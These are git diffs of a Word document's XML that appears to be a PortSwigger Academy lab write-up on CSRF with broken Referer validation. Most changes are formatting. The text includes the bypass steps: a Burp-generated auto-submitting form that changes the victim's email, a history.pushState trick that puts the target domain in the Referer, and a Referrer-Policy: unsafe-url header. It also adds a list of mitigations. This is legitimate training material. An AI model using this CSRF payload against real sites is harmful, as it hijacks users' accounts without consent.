--- a/PortSwigger Labs/Client Side Topics/Cross Site Request Forgery - CSRF/Lab 9 - CSRF with broken Referer validation.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Site Request Forgery - CSRF/Lab 9 - CSRF with broken Referer validation.docx
@@ -194,7 +194,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Open the web application and login with the given credentials to act as an user.</w:t>
+        <w:t xml:space="preserve">Open the web application and login with the given credentials to act as </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>an</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> user.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -260,15 +278,53 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Now use the Engagement tools from BurpSuite’s Repeater and generate CSRF PoC using it and add auto submit as true</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and replace the history.pushState function with the Payload 2</w:t>
+        <w:t xml:space="preserve">Now use the Engagement tools from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Repeater and generate CSRF PoC using it and add auto submit as true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and replace the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>history.pushState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function with the Payload 2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -306,7 +362,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>add the Payload 3 into the head section of the exploit server as nowadays servers strips the string and sends only the domain name.</w:t>
+        <w:t xml:space="preserve">add the Payload 3 into the head section of the exploit server as nowadays servers </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>strips</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the string and sends only the domain name.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -486,13 +560,23 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Referer: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
@@ -519,13 +603,25 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>history.pushState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>("", "", "/?YOUR-LAB-ID.web-security-academy.net")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -547,8 +643,18 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Referrer-Policy: unsafe-url</w:t>
-      </w:r>
+        <w:t>Referrer-Policy: unsafe-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -587,7 +693,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;!--</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -624,7 +748,27 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">  &lt;script&gt;history.pushState("", "", "/?0a3500770475bd508111b6ac0097003d.web-security-academy.net")&lt;/script&gt;</w:t>
+        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>history.pushState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>("", "", "/?0a3500770475bd508111b6ac0097003d.web-security-academy.net")&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -660,7 +804,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">      &lt;input type="hidden" name="email" value="wiener&amp;#64;normal&amp;#45;user&amp;#46;net" /&gt;</w:t>
+        <w:t xml:space="preserve">      &lt;input type="hidden" name="email" value="wiener&amp;#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>64;normal</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&amp;#45;user&amp;#46;net" /&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -732,7 +894,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">      document.forms[0].submit();</w:t>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>document.forms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>[0].submit();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -825,13 +1007,99 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Strict Referrer Header Checks:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Validate the entire Referrer header to ensure requests originate only from trusted domains. Partial matches or allowing substrings can be exploited, as demonstrated.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Anti-CSRF Tokens:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Introduce anti-CSRF tokens that are tied to the user's session and include them in every state-changing request. Ensure server-side validation of these tokens with every such request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Content Security Policy:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement a strict Content Security Policy (CSP) that prevents unauthorized scripts from executing, reducing potential exploit avenues.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -1486,6 +1754,95 @@
     <w:nsid w:val="68F30063"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="412CAB28"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="744835CD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5B8C9CF4"/>
     <w:lvl w:ilvl="0" w:tplc="4009000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -1594,6 +1951,9 @@
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1792900401">
     <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1221750385">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Client Side Topics/Cross Site Request Forgery - CSRF/Lab 9 - CSRF with broken Referer validation.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Site Request Forgery - CSRF/Lab 9 - CSRF with broken Referer validation.docx
@@ -970,6 +970,170 @@
         </w:rPr>
         <w:t>&lt;/html&gt;</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="200C9845" wp14:editId="33ED4706">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>4721860</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="984250"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1417921199" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1417921199" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="984250"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3574932E" wp14:editId="3378D737">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>475615</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5676900" cy="4016375"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="573889877" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="573889877" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5676900" cy="4016375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
